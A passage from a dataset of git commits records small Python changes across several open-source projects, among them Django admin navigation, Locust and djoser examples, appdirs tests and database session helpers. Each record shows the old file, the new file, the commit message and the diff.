commit
stringlengths 40
40
| old_file
stringlengths 4
150
| new_file
stringlengths 4
150
| old_contents
stringlengths 0
3.26k
| new_contents
stringlengths 1
4.43k
| subject
stringlengths 15
501
| message
stringlengths 15
4.06k
| lang
stringclasses 4
values | license
stringclasses 13
values | repos
stringlengths 5
91.5k
| diff
stringlengths 0
4.35k
|
|---|---|---|---|---|---|---|---|---|---|---|
5977eb82f2614efe8cde843913db62a93c7978f5
|
navigation_extensions.py
|
navigation_extensions.py
|
from django.utils.text import capfirst
from django.utils.translation import ugettext_lazy as _
from feincms.module.page.extensions.navigation import NavigationExtension, PagePretender
class ZivinetzNavigationExtension(NavigationExtension):
name = _('Zivinetz navigation extension')
def children(self, page, **kwargs):
request = kwargs.get('request')
if request.user.is_authenticated() and request.user.is_staff:
urls = [
(_('scheduling'), 'admin/scheduling/'),
(_('waitlist'), 'admin/waitlist/'),
(_('drudges'), 'admin/drudges/'),
(_('assignments'), 'admin/assignments/'),
(_('job references'), 'admin/jobreferences/'),
(_('expense reports'), 'admin/expense_reports/'),
(_('regional offices'), 'admin/regional_offices/'),
(_('scope statements'), 'admin/scope_statements/'),
(_('specifications'), 'admin/specifications/'),
]
else:
urls = [
(_('dashboard'), 'dashboard/'),
(_('profile'), 'profile/'),
]
return [PagePretender(
title=capfirst(title),
url='%s%s' % (page.get_navigation_url(), url),
level=page.level+1,
tree_id=page.tree_id,
) for title, url in urls]
|
from django.utils.text import capfirst
from django.utils.translation import ugettext_lazy as _
from feincms.module.page.extensions.navigation import NavigationExtension, PagePretender
class ZivinetzNavigationExtension(NavigationExtension):
name = _('Zivinetz navigation extension')
def children(self, page, **kwargs):
request = kwargs.get('request')
if request.user.is_authenticated() and request.user.is_staff:
urls = [
(_('scheduling'), 'admin/scheduling/'),
(_('waitlist'), 'admin/waitlist/'),
(_('drudges'), 'admin/drudges/'),
(_('assignments'), 'admin/assignments/'),
(_('expense reports'), 'admin/expense_reports/'),
(_('regional offices'), 'admin/regional_offices/'),
(_('scope statements'), 'admin/scope_statements/'),
(_('specifications'), 'admin/specifications/'),
]
else:
urls = [
(_('dashboard'), 'dashboard/'),
(_('profile'), 'profile/'),
]
return [PagePretender(
title=capfirst(title),
url='%s%s' % (page.get_navigation_url(), url),
level=page.level+1,
tree_id=page.tree_id,
) for title, url in urls]
|
Remove job references from navigation
|
Remove job references from navigation
|
Python
|
mit
|
matthiask/zivinetz,matthiask/zivinetz,matthiask/zivinetz,matthiask/zivinetz
|
---
+++
@@ -16,7 +16,6 @@
(_('waitlist'), 'admin/waitlist/'),
(_('drudges'), 'admin/drudges/'),
(_('assignments'), 'admin/assignments/'),
- (_('job references'), 'admin/jobreferences/'),
(_('expense reports'), 'admin/expense_reports/'),
(_('regional offices'), 'admin/regional_offices/'),
(_('scope statements'), 'admin/scope_statements/'),
|
593bab981f36f7af52ae55914c18e368e8c1a94f
|
examples/app-on-ws-init.py
|
examples/app-on-ws-init.py
|
#!/usr/bin/env python3
# https://faq.i3wm.org/question/3699/how-can-i-open-an-application-when-i-open-a-certain-workspace-for-the-first-time/
from argparse import ArgumentParser
import i3ipc
i3 = i3ipc.Connection()
parser = ArgumentParser(description='Open an application on a given workspace when it is initialized')
parser.add_argument('--workspace', metavar='NAME', help='The name of the workspace')
parser.add_argument('--command', metavar='CMD', help='The command to run on the newly initted workspace')
args = parser.parse_args()
def on_workspace(i3, e):
if e.current.props.name == args.workspace and not len(e.current.leaves()):
i3.command('exec {}'.format(args.command))
i3.on('workspace::focus', on_workspace)
i3.main()
|
#!/usr/bin/env python3
# https://faq.i3wm.org/question/3699/how-can-i-open-an-application-when-i-open-a-certain-workspace-for-the-first-time/
from argparse import ArgumentParser
import i3ipc
i3 = i3ipc.Connection()
parser = ArgumentParser(description="""Open the given application each time the
given workspace is created. For instance, running 'app-on-ws-init.py 6
i3-sensible-terminal' should open your terminal as soon as you create the
workspace 6.
""")
parser.add_argument('workspace', metavar='WS_NAME', help='The name of the workspace')
parser.add_argument('command', metavar='CMD', help='The command to run on the newly initted workspace')
args = parser.parse_args()
def on_workspace(i3, e):
if e.current.props.name == args.workspace and not len(e.current.leaves()):
i3.command('exec {}'.format(args.command))
i3.on('workspace::focus', on_workspace)
i3.main()
|
Make the 2 mandatory parameters mandatory. Make the help message a bit clearer and provides an example.
|
Make the 2 mandatory parameters mandatory.
Make the help message a bit clearer and provides an example.
|
Python
|
bsd-3-clause
|
xenomachina/i3ipc-python,nicoe/i3ipc-python,acrisci/i3ipc-python,chrsclmn/i3ipc-python
|
---
+++
@@ -7,10 +7,14 @@
i3 = i3ipc.Connection()
-parser = ArgumentParser(description='Open an application on a given workspace when it is initialized')
+parser = ArgumentParser(description="""Open the given application each time the
+ given workspace is created. For instance, running 'app-on-ws-init.py 6
+ i3-sensible-terminal' should open your terminal as soon as you create the
+ workspace 6.
+ """)
-parser.add_argument('--workspace', metavar='NAME', help='The name of the workspace')
-parser.add_argument('--command', metavar='CMD', help='The command to run on the newly initted workspace')
+parser.add_argument('workspace', metavar='WS_NAME', help='The name of the workspace')
+parser.add_argument('command', metavar='CMD', help='The command to run on the newly initted workspace')
args = parser.parse_args()
|
23f23884cb55899a77b08dfa8c1649a195815f8c
|
examples/semaphore_wait.py
|
examples/semaphore_wait.py
|
from locust import HttpLocust, TaskSet, task, events, between
from gevent.lock import Semaphore
all_locusts_spawned = Semaphore()
all_locusts_spawned.acquire()
def on_hatch_complete(**kw):
all_locusts_spawned.release()
events.hatch_complete += on_hatch_complete
class UserTasks(TaskSet):
def on_start(self):
all_locusts_spawned.wait()
self.wait()
@task
def index(self):
self.client.get("/")
class WebsiteUser(HttpLocust):
host = "http://127.0.0.1:8089"
wait_time = between(2, 5)
task_set = UserTasks
|
from locust import HttpLocust, TaskSet, task, events, between
from gevent.lock import Semaphore
all_locusts_spawned = Semaphore()
all_locusts_spawned.acquire()
@events.init.add_listener
def _(environment, **kw):
@environment.events.hatch_complete.add_listener
def on_hatch_complete(**kw):
all_locusts_spawned.release()
class UserTasks(TaskSet):
def on_start(self):
all_locusts_spawned.wait()
self.wait()
@task
def index(self):
self.client.get("/")
class WebsiteUser(HttpLocust):
host = "http://127.0.0.1:8089"
wait_time = between(2, 5)
task_set = UserTasks
|
Update example to use new event API
|
Update example to use new event API
|
Python
|
mit
|
locustio/locust,locustio/locust,locustio/locust,mbeacom/locust,mbeacom/locust,mbeacom/locust,locustio/locust,mbeacom/locust
|
---
+++
@@ -5,10 +5,11 @@
all_locusts_spawned = Semaphore()
all_locusts_spawned.acquire()
-def on_hatch_complete(**kw):
- all_locusts_spawned.release()
-
-events.hatch_complete += on_hatch_complete
+@events.init.add_listener
+def _(environment, **kw):
+ @environment.events.hatch_complete.add_listener
+ def on_hatch_complete(**kw):
+ all_locusts_spawned.release()
class UserTasks(TaskSet):
def on_start(self):
|
4ebdc10add211cb238002fcc79a7cf8409d99825
|
djoser/social/views.py
|
djoser/social/views.py
|
from rest_framework import generics, permissions, status
from rest_framework.response import Response
from social_django.utils import load_backend, load_strategy
from djoser.conf import settings
from djoser.social.serializers import ProviderAuthSerializer
class ProviderAuthView(generics.CreateAPIView):
permission_classes = [permissions.AllowAny]
serializer_class = ProviderAuthSerializer
def get(self, request, *args, **kwargs):
redirect_uri = request.GET.get("redirect_uri")
if redirect_uri not in settings.SOCIAL_AUTH_ALLOWED_REDIRECT_URIS:
return Response(status=status.HTTP_400_BAD_REQUEST)
strategy = load_strategy(request)
strategy.session_set("redirect_uri", redirect_uri)
backend_name = self.kwargs["provider"]
backend = load_backend(strategy, backend_name, redirect_uri=redirect_uri)
authorization_url = backend.auth_url()
return Response(data={"authorization_url": authorization_url})
|
from rest_framework import generics, permissions, status
from rest_framework.response import Response
from social_django.utils import load_backend, load_strategy
from djoser.conf import settings
from djoser.social.serializers import ProviderAuthSerializer
class ProviderAuthView(generics.CreateAPIView):
permission_classes = [permissions.AllowAny]
serializer_class = ProviderAuthSerializer
def get(self, request, *args, **kwargs):
redirect_uri = request.GET.get("redirect_uri")
if redirect_uri not in settings.SOCIAL_AUTH_ALLOWED_REDIRECT_URIS:
return Response("Missing SOCIAL_AUTH_ALLOWED_REDIRECT_URIS", status=status.HTTP_400_BAD_REQUEST)
strategy = load_strategy(request)
strategy.session_set("redirect_uri", redirect_uri)
backend_name = self.kwargs["provider"]
backend = load_backend(strategy, backend_name, redirect_uri=redirect_uri)
authorization_url = backend.auth_url()
return Response(data={"authorization_url": authorization_url})
|
Fix for Friendly tips when Missing SOCIAL_AUTH_ALLOWED_REDIRECT_URIS
|
Fix for Friendly tips when Missing SOCIAL_AUTH_ALLOWED_REDIRECT_URIS
i forget add SOCIAL_AUTH_ALLOWED_REDIRECT_URIS to my config
it return 400 error, i don't know why , i pay more time find the issues
so i add Friendly tips
-- sorry , my english is not well
and thank you all
|
Python
|
mit
|
sunscrapers/djoser,sunscrapers/djoser,sunscrapers/djoser
|
---
+++
@@ -13,7 +13,7 @@
def get(self, request, *args, **kwargs):
redirect_uri = request.GET.get("redirect_uri")
if redirect_uri not in settings.SOCIAL_AUTH_ALLOWED_REDIRECT_URIS:
- return Response(status=status.HTTP_400_BAD_REQUEST)
+ return Response("Missing SOCIAL_AUTH_ALLOWED_REDIRECT_URIS", status=status.HTTP_400_BAD_REQUEST)
strategy = load_strategy(request)
strategy.session_set("redirect_uri", redirect_uri)
|
745565adaff36e95676c427157acb52112e0a3cc
|
sitenco/config/vcs.py
|
sitenco/config/vcs.py
|
"""
Version control management tools.
"""
import abc
import brigit
from docutils import nodes
from docutils.parsers.rst import directives
from .tool import Tool, Directive
class VCS(Tool):
"""Abstract class for VCS tools."""
__metaclass__ = abc.ABCMeta
def __init__(self, path, branch, url=None):
self.path = path
self.branch = branch
super(VCS, self).__init__()
@abc.abstractmethod
def log(self, number=10):
"""List of :class:`Commit` items."""
raise NotImplementedError
class Git(VCS):
"""Git tool."""
def __init__(self, path, branch='master', url=None):
self._repository = brigit.Git(path)
super(Git, self).__init__(path, branch)
def log(self, number=10):
commits = "%s~%i..%s" % (self.branch, number, self.branch)
return self._repository.pretty_log(commits)
def update(self):
self._repository.fetch()
class Log(Directive):
"""List logs as a definition list."""
option_spec = {'number': directives.nonnegative_int}
def run(self):
children = []
for item in self.tool.log():
children.append(nodes.term(text=item['hash']))
children.append(
nodes.definition('', nodes.paragraph(text=item['message'])))
definition_list = nodes.definition_list('', *children)
return [definition_list]
|
"""
Version control management tools.
"""
import abc
import brigit
from docutils import nodes
from docutils.parsers.rst import directives
from .tool import Tool, Directive
class VCS(Tool):
"""Abstract class for VCS tools."""
__metaclass__ = abc.ABCMeta
def __init__(self, path, branch, url=None):
self.path = path
self.branch = branch
self.url = url
super(VCS, self).__init__()
@abc.abstractmethod
def log(self, number=10):
"""List of :class:`Commit` items."""
raise NotImplementedError
class Git(VCS):
"""Git tool."""
def __init__(self, path, branch='master', url=None):
super(Git, self).__init__(path, branch, url)
self._repository = brigit.Git(path, remote=self.url)
def log(self, number=10):
commits = "%s~%i..%s" % (self.branch, number, self.branch)
return self._repository.pretty_log(commits)
def update(self):
self._repository.fetch()
class Log(Directive):
"""List logs as a definition list."""
option_spec = {'number': directives.nonnegative_int}
def run(self):
children = []
for item in self.tool.log():
children.append(nodes.term(text=item['hash']))
children.append(
nodes.definition('', nodes.paragraph(text=item['message'])))
definition_list = nodes.definition_list('', *children)
return [definition_list]
|
Clone git repos if they do not exist.
|
Clone git repos if they do not exist.
|
Python
|
bsd-3-clause
|
Kozea/sitenco
|
---
+++
@@ -18,6 +18,7 @@
def __init__(self, path, branch, url=None):
self.path = path
self.branch = branch
+ self.url = url
super(VCS, self).__init__()
@abc.abstractmethod
@@ -29,8 +30,8 @@
class Git(VCS):
"""Git tool."""
def __init__(self, path, branch='master', url=None):
- self._repository = brigit.Git(path)
- super(Git, self).__init__(path, branch)
+ super(Git, self).__init__(path, branch, url)
+ self._repository = brigit.Git(path, remote=self.url)
def log(self, number=10):
commits = "%s~%i..%s" % (self.branch, number, self.branch)
|
676c2a67877c32ad8845f374955ac07fdfbab561
|
domain_models/fields.py
|
domain_models/fields.py
|
"""Domain models fields."""
class Field(property):
"""Base field."""
def __init__(self):
"""Initializer."""
self.name = None
self.value = None
self.model = None
super(Field, self).__init__(self._get, self._set)
def _get(self, _):
"""Return field's value."""
return self.value
def _set(self, _, value):
"""Set field's value."""
self.value = value
class Int(Field):
"""Int field."""
def _set(self, _, value):
"""Set field's value."""
self.value = int(value)
class String(Field):
"""String field."""
def _set(self, _, value):
"""Set field's value."""
self.value = str(value)
class Unicode(Field):
"""Unicode string field."""
def _set(self, _, value):
"""Set field's value."""
self.value = unicode(value)
|
"""Domain models fields."""
import six
class Field(property):
"""Base field."""
def __init__(self):
"""Initializer."""
self.name = None
self.value = None
self.model = None
super(Field, self).__init__(self._get, self._set)
def _get(self, _):
"""Return field's value."""
return self.value
def _set(self, _, value):
"""Set field's value."""
self.value = value
class Int(Field):
"""Int field."""
def _set(self, _, value):
"""Set field's value."""
self.value = int(value)
class String(Field):
"""String field."""
def _set(self, _, value):
"""Set field's value."""
self.value = str(value)
class Unicode(Field):
"""Unicode string field."""
def _set(self, _, value):
"""Set field's value."""
self.value = six.u(value)
|
Fix Unicode field in Python 3.2
|
Fix Unicode field in Python 3.2
|
Python
|
bsd-3-clause
|
ets-labs/domain_models,rmk135/domain_models,ets-labs/python-domain-models
|
---
+++
@@ -1,4 +1,6 @@
"""Domain models fields."""
+
+import six
class Field(property):
@@ -41,4 +43,4 @@
def _set(self, _, value):
"""Set field's value."""
- self.value = unicode(value)
+ self.value = six.u(value)
|
bb4a67d2817ccca3b15e09db1d72823626bd2ed6
|
glitter/publisher/admin.py
|
glitter/publisher/admin.py
|
from __future__ import unicode_literals
from django import forms
from django.contrib.contenttypes.admin import GenericStackedInline
from .forms import object_version_choices
from .models import PublishAction
class ActionInline(GenericStackedInline):
model = PublishAction
fields = ('scheduled_time', 'publish_version')
extra = 0
def get_formset(self, request, obj=None, form=None, **kwargs):
class VersionForm(forms.ModelForm):
"""
Customised form which limits the users choices to versions which have been saved for
this object.
"""
class Meta:
widgets = {
'publish_version': forms.widgets.Select(
choices=object_version_choices(obj=obj),
),
}
BaseFormset = super(ActionInline, self).get_formset(
request, obj, form=VersionForm, **kwargs
)
class ActionFormset(BaseFormset):
"""
Customised formset to save the user who has created/updated the action.
"""
def save_new(self, form, commit):
obj = super(ActionFormset, self).save_new(form, commit=False)
obj.user = request.user
obj.save()
return obj
def save_existing(self, form, instance, commit):
obj = super(ActionFormset, self).save_existing(form, instance, commit=False)
obj.user = request.user
obj.save()
return obj
return ActionFormset
|
from __future__ import unicode_literals
from django import forms
from django.contrib.contenttypes.admin import GenericStackedInline
from .forms import object_version_choices
from .models import PublishAction
class ActionInline(GenericStackedInline):
model = PublishAction
fields = ('scheduled_time', 'publish_version')
extra = 0
def get_formset(self, request, obj=None, form=None, **kwargs):
BaseFormset = super(ActionInline, self).get_formset(request, obj, **kwargs)
class ActionFormset(BaseFormset):
"""
Customised formset to save the user who has created/updated the action.
"""
def save_new(self, form, commit):
obj = super(ActionFormset, self).save_new(form, commit=False)
obj.user = request.user
obj.save()
return obj
def save_existing(self, form, instance, commit):
obj = super(ActionFormset, self).save_existing(form, instance, commit=False)
obj.user = request.user
obj.save()
return obj
# Customised widget which limits the users choices to versions which have been saved for
# this object.
ActionFormset.form.base_fields['publish_version'].widget = forms.widgets.Select(
choices=object_version_choices(obj=obj),
)
return ActionFormset
|
Rework the versions form widget
|
Rework the versions form widget
|
Python
|
bsd-3-clause
|
developersociety/django-glitter,blancltd/django-glitter,blancltd/django-glitter,developersociety/django-glitter,blancltd/django-glitter,developersociety/django-glitter
|
---
+++
@@ -13,21 +13,7 @@
extra = 0
def get_formset(self, request, obj=None, form=None, **kwargs):
- class VersionForm(forms.ModelForm):
- """
- Customised form which limits the users choices to versions which have been saved for
- this object.
- """
- class Meta:
- widgets = {
- 'publish_version': forms.widgets.Select(
- choices=object_version_choices(obj=obj),
- ),
- }
-
- BaseFormset = super(ActionInline, self).get_formset(
- request, obj, form=VersionForm, **kwargs
- )
+ BaseFormset = super(ActionInline, self).get_formset(request, obj, **kwargs)
class ActionFormset(BaseFormset):
"""
@@ -45,4 +31,10 @@
obj.save()
return obj
+ # Customised widget which limits the users choices to versions which have been saved for
+ # this object.
+ ActionFormset.form.base_fields['publish_version'].widget = forms.widgets.Select(
+ choices=object_version_choices(obj=obj),
+ )
+
return ActionFormset
|
51757c8a893640e2a9fa3a7b9f8e617b22e6db87
|
test/test_api.py
|
test/test_api.py
|
import unittest
import appdirs
class Test_AppDir(unittest.TestCase):
def test_metadata(self):
self.assertTrue(hasattr(appdirs, "__version__"))
self.assertTrue(hasattr(appdirs, "__version_info__"))
def test_helpers(self):
self.assertTrue(isinstance(
appdirs.user_data_dir('MyApp', 'MyCompany'), str))
self.assertTrue(isinstance(
appdirs.site_data_dir('MyApp', 'MyCompany'), str))
self.assertTrue(isinstance(
appdirs.user_cache_dir('MyApp', 'MyCompany'), str))
self.assertTrue(isinstance(
appdirs.user_log_dir('MyApp', 'MyCompany'), str))
def test_dirs(self):
dirs = appdirs.AppDirs('MyApp', 'MyCompany', version='1.0')
self.assertTrue(isinstance(dirs.user_data_dir, str))
self.assertTrue(isinstance(dirs.site_data_dir, str))
self.assertTrue(isinstance(dirs.user_cache_dir, str))
self.assertTrue(isinstance(dirs.user_log_dir, str))
if __name__=="__main__":
unittest.main()
|
import unittest
import appdirs
class Test_AppDir(unittest.TestCase):
def test_metadata(self):
self.assertTrue(hasattr(appdirs, "__version__"))
self.assertTrue(hasattr(appdirs, "__version_info__"))
def test_helpers(self):
self.assertIsInstance(
appdirs.user_data_dir('MyApp', 'MyCompany'), str)
self.assertIsInstance(
appdirs.site_data_dir('MyApp', 'MyCompany'), str)
self.assertIsInstance(
appdirs.user_cache_dir('MyApp', 'MyCompany'), str)
self.assertIsInstance(
appdirs.user_log_dir('MyApp', 'MyCompany'), str)
def test_dirs(self):
dirs = appdirs.AppDirs('MyApp', 'MyCompany', version='1.0')
self.assertIsInstance(dirs.user_data_dir, str)
self.assertIsInstance(dirs.site_data_dir, str)
self.assertIsInstance(dirs.user_cache_dir, str)
self.assertIsInstance(dirs.user_log_dir, str)
if __name__=="__main__":
unittest.main()
|
Use assertIsInstance() instead of assertTrue(isinstance()).
|
Use assertIsInstance() instead of assertTrue(isinstance()).
|
Python
|
mit
|
platformdirs/platformdirs
|
---
+++
@@ -7,21 +7,21 @@
self.assertTrue(hasattr(appdirs, "__version_info__"))
def test_helpers(self):
- self.assertTrue(isinstance(
- appdirs.user_data_dir('MyApp', 'MyCompany'), str))
- self.assertTrue(isinstance(
- appdirs.site_data_dir('MyApp', 'MyCompany'), str))
- self.assertTrue(isinstance(
- appdirs.user_cache_dir('MyApp', 'MyCompany'), str))
- self.assertTrue(isinstance(
- appdirs.user_log_dir('MyApp', 'MyCompany'), str))
+ self.assertIsInstance(
+ appdirs.user_data_dir('MyApp', 'MyCompany'), str)
+ self.assertIsInstance(
+ appdirs.site_data_dir('MyApp', 'MyCompany'), str)
+ self.assertIsInstance(
+ appdirs.user_cache_dir('MyApp', 'MyCompany'), str)
+ self.assertIsInstance(
+ appdirs.user_log_dir('MyApp', 'MyCompany'), str)
def test_dirs(self):
dirs = appdirs.AppDirs('MyApp', 'MyCompany', version='1.0')
- self.assertTrue(isinstance(dirs.user_data_dir, str))
- self.assertTrue(isinstance(dirs.site_data_dir, str))
- self.assertTrue(isinstance(dirs.user_cache_dir, str))
- self.assertTrue(isinstance(dirs.user_log_dir, str))
+ self.assertIsInstance(dirs.user_data_dir, str)
+ self.assertIsInstance(dirs.site_data_dir, str)
+ self.assertIsInstance(dirs.user_cache_dir, str)
+ self.assertIsInstance(dirs.user_log_dir, str)
if __name__=="__main__":
unittest.main()
|
b5047a36ffec7515986e92346a17657247319e6e
|
webapp/config/env/development_admin.py
|
webapp/config/env/development_admin.py
|
from datetime import timedelta
from pathlib import Path
DEBUG = True
PERMANENT_SESSION_LIFETIME = timedelta(14)
SECRET_KEY = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
SESSION_COOKIE_SECURE = True
LOCALE = 'de_DE.UTF-8'
LOCALES_FORMS = ['de']
SQLALCHEMY_DATABASE_URI = 'postgresql+pg8000://byceps:boioioing@127.0.0.1/byceps'
SQLALCHEMY_ECHO = False
REDIS_URL = 'redis://127.0.0.1:6379/0'
MODE = 'admin'
PATH_DATA = Path('./data')
PATH_USER_AVATAR_IMAGES = PATH_DATA / 'users/avatars'
BOARD_TOPICS_PER_PAGE = 10
BOARD_POSTINGS_PER_PAGE = 10
MAIL_DEBUG = True
MAIL_DEFAULT_SENDER = 'BYCEPS <noreply@example.com>'
MAIL_SUPPRESS_SEND = True
ROOT_REDIRECT_TARGET = 'admin/orgas/birthdays'
|
from datetime import timedelta
from pathlib import Path
DEBUG = True
PERMANENT_SESSION_LIFETIME = timedelta(14)
SECRET_KEY = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
SESSION_COOKIE_SECURE = False
LOCALE = 'de_DE.UTF-8'
LOCALES_FORMS = ['de']
SQLALCHEMY_DATABASE_URI = 'postgresql+pg8000://byceps:boioioing@127.0.0.1/byceps'
SQLALCHEMY_ECHO = False
REDIS_URL = 'redis://127.0.0.1:6379/0'
MODE = 'admin'
PATH_DATA = Path('./data')
PATH_USER_AVATAR_IMAGES = PATH_DATA / 'users/avatars'
BOARD_TOPICS_PER_PAGE = 10
BOARD_POSTINGS_PER_PAGE = 10
MAIL_DEBUG = True
MAIL_DEFAULT_SENDER = 'BYCEPS <noreply@example.com>'
MAIL_SUPPRESS_SEND = True
ROOT_REDIRECT_TARGET = 'admin/orgas/birthdays'
|
Disable secure cookies for admin development.
|
Disable secure cookies for admin development.
|
Python
|
bsd-3-clause
|
homeworkprod/byceps,m-ober/byceps,homeworkprod/byceps,m-ober/byceps,m-ober/byceps,homeworkprod/byceps
|
---
+++
@@ -5,7 +5,7 @@
DEBUG = True
PERMANENT_SESSION_LIFETIME = timedelta(14)
SECRET_KEY = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
-SESSION_COOKIE_SECURE = True
+SESSION_COOKIE_SECURE = False
LOCALE = 'de_DE.UTF-8'
LOCALES_FORMS = ['de']
|
537655c2c60522d5776fbd9c35cead4dc766806b
|
example/example/urls.py
|
example/example/urls.py
|
from django.conf.urls import include, url
from django.contrib import admin
from django.views.generic.base import TemplateView
admin.autodiscover()
urlpatterns = [
url(r'^accounts/', include('allauth.urls')),
url(r'^$', TemplateView.as_view(template_name='index.html')),
url(r'^accounts/profile/$', TemplateView.as_view(template_name='profile.html')),
url(r'^admin/', include(admin.site.urls)),
]
|
from django.conf.urls import include, url
from django.contrib import admin
from django.views.generic.base import TemplateView
admin.autodiscover()
urlpatterns = [
url(r'^accounts/', include('allauth.urls')),
url(r'^$', TemplateView.as_view(template_name='index.html')),
url(r'^accounts/profile/$', TemplateView.as_view(template_name='profile.html')),
url(r'^admin/', admin.site.urls),
]
|
Fix example urlconf to be compatible with Django 2.0
|
fix(example): Fix example urlconf to be compatible with Django 2.0
|
Python
|
mit
|
AltSchool/django-allauth,rsalmaso/django-allauth,pennersr/django-allauth,pztrick/django-allauth,bittner/django-allauth,AltSchool/django-allauth,pztrick/django-allauth,pennersr/django-allauth,rsalmaso/django-allauth,rsalmaso/django-allauth,lukeburden/django-allauth,pennersr/django-allauth,lukeburden/django-allauth,pztrick/django-allauth,bittner/django-allauth,bittner/django-allauth,AltSchool/django-allauth,lukeburden/django-allauth
|
---
+++
@@ -7,5 +7,5 @@
url(r'^accounts/', include('allauth.urls')),
url(r'^$', TemplateView.as_view(template_name='index.html')),
url(r'^accounts/profile/$', TemplateView.as_view(template_name='profile.html')),
- url(r'^admin/', include(admin.site.urls)),
+ url(r'^admin/', admin.site.urls),
]
|
23c9aeb707f6bc0b6948dffb03bd7c960b7e97a8
|
tests/test_vector2_reflect.py
|
tests/test_vector2_reflect.py
|
from ppb_vector import Vector2
import pytest
from hypothesis import given, assume, note
from math import isclose, isinf
from utils import units, vectors
reflect_data = (
(Vector2(1, 1), Vector2(0, -1), Vector2(1, -1)),
(Vector2(1, 1), Vector2(-1, 0), Vector2(-1, 1)),
(Vector2(0, 1), Vector2(0, -1), Vector2(0, -1)),
(Vector2(-1, -1), Vector2(1, 0), Vector2(1, -1)),
(Vector2(-1, -1), Vector2(-1, 0), Vector2(1, -1))
)
@pytest.mark.parametrize("initial_vector, surface_normal, expected_vector", reflect_data)
def test_reflect(initial_vector, surface_normal, expected_vector):
assert initial_vector.reflect(surface_normal).isclose(expected_vector)
@given(initial=vectors(), normal=units())
def test_reflect_prop(initial: Vector2, normal: Vector2):
assume(initial ^ normal != 0)
reflected = initial.reflect(normal)
returned = reflected.reflect(normal)
note(f"Reflected: {reflected}")
assert not any(map(isinf, reflected))
assert initial.isclose(returned)
assert isclose((initial * normal), -(reflected * normal))
|
from ppb_vector import Vector2
import pytest
from hypothesis import given, assume, note
from math import isclose, isinf
from utils import angle_isclose, units, vectors
reflect_data = (
(Vector2(1, 1), Vector2(0, -1), Vector2(1, -1)),
(Vector2(1, 1), Vector2(-1, 0), Vector2(-1, 1)),
(Vector2(0, 1), Vector2(0, -1), Vector2(0, -1)),
(Vector2(-1, -1), Vector2(1, 0), Vector2(1, -1)),
(Vector2(-1, -1), Vector2(-1, 0), Vector2(1, -1))
)
@pytest.mark.parametrize("initial_vector, surface_normal, expected_vector", reflect_data)
def test_reflect(initial_vector, surface_normal, expected_vector):
assert initial_vector.reflect(surface_normal).isclose(expected_vector)
@given(initial=vectors(), normal=units())
def test_reflect_prop(initial: Vector2, normal: Vector2):
assume(initial ^ normal != 0)
reflected = initial.reflect(normal)
returned = reflected.reflect(normal)
note(f"Reflected: {reflected}")
assert not any(map(isinf, reflected))
assert initial.isclose(returned)
assert isclose((initial * normal), -(reflected * normal))
assert angle_isclose(normal.angle(initial),
180 - normal.angle(reflected)
)
|
Add a property tying reflect() and angle()
|
test_reflect_prop: Add a property tying reflect() and angle()
|
Python
|
artistic-2.0
|
ppb/ppb-vector,ppb/ppb-vector
|
---
+++
@@ -2,7 +2,7 @@
import pytest
from hypothesis import given, assume, note
from math import isclose, isinf
-from utils import units, vectors
+from utils import angle_isclose, units, vectors
reflect_data = (
@@ -28,3 +28,6 @@
assert not any(map(isinf, reflected))
assert initial.isclose(returned)
assert isclose((initial * normal), -(reflected * normal))
+ assert angle_isclose(normal.angle(initial),
+ 180 - normal.angle(reflected)
+ )
|
53239498023a2ebe6d25a99d09430046b3b40e83
|
rtrss/database.py
|
rtrss/database.py
|
import logging
from contextlib import contextmanager
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.exc import SQLAlchemyError
from rtrss.exceptions import OperationInterruptedException
from rtrss import config
_logger = logging.getLogger(__name__)
engine = create_engine(config.SQLALCHEMY_DATABASE_URI, client_encoding='utf8')
Session = sessionmaker(bind=engine)
@contextmanager
def session_scope(SessionFactory=None):
"""Provide a transactional scope around a series of operations."""
if SessionFactory is None:
SessionFactory = Session
session = SessionFactory()
try:
yield session
except SQLAlchemyError as e:
_logger.error("Database error %s", e)
session.rollback()
raise OperationInterruptedException(e)
else:
session.commit()
finally:
session.close()
def init_db():
_logger.info('Initializing database')
from rtrss.models import Base
Base.metadata.create_all(bind=engine)
def clear_db():
_logger.info('Clearing database')
from rtrss.models import Base
Base.metadata.drop_all(bind=engine)
|
import logging
from contextlib import contextmanager
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.exc import SQLAlchemyError
from rtrss.exceptions import OperationInterruptedException
from rtrss import config
_logger = logging.getLogger(__name__)
engine = create_engine(config.SQLALCHEMY_DATABASE_URI, client_encoding='utf8')
Session = sessionmaker(bind=engine)
@contextmanager
def session_scope(SessionFactory=None):
"""Provide a transactional scope around a series of operations."""
if SessionFactory is None:
SessionFactory = Session
session = SessionFactory()
try:
yield session
except SQLAlchemyError as e:
_logger.error("Database error %s", e)
session.rollback()
raise OperationInterruptedException(e)
else:
session.commit()
finally:
session.close()
def init_db(eng=None):
_logger.info('Initializing database')
if eng is None:
eng = engine
from rtrss.models import Base
Base.metadata.create_all(bind=eng)
def clear_db(eng=None):
_logger.info('Clearing database')
if eng is None:
eng = engine
from rtrss.models import Base
Base.metadata.drop_all(bind=eng)
|
Fix init_db and clear_db functions
|
Fix init_db and clear_db functions
|
Python
|
apache-2.0
|
notapresent/rtrss,notapresent/rtrss,notapresent/rtrss,notapresent/rtrss
|
---
+++
@@ -31,13 +31,21 @@
session.close()
-def init_db():
+def init_db(eng=None):
_logger.info('Initializing database')
+
+ if eng is None:
+ eng = engine
+
from rtrss.models import Base
- Base.metadata.create_all(bind=engine)
+ Base.metadata.create_all(bind=eng)
-def clear_db():
+def clear_db(eng=None):
_logger.info('Clearing database')
+
+ if eng is None:
+ eng = engine
from rtrss.models import Base
- Base.metadata.drop_all(bind=engine)
+
+ Base.metadata.drop_all(bind=eng)
|
37c33a4a133326cce7083ea68607971344f0e6ed
|
rules/binutils.py
|
rules/binutils.py
|
import xyz
import os
import shutil
class Binutils(xyz.BuildProtocol):
pkg_name = 'binutils'
supported_targets = ['arm-none-eabi']
def check(self, builder):
if builder.target not in self.supported_targets:
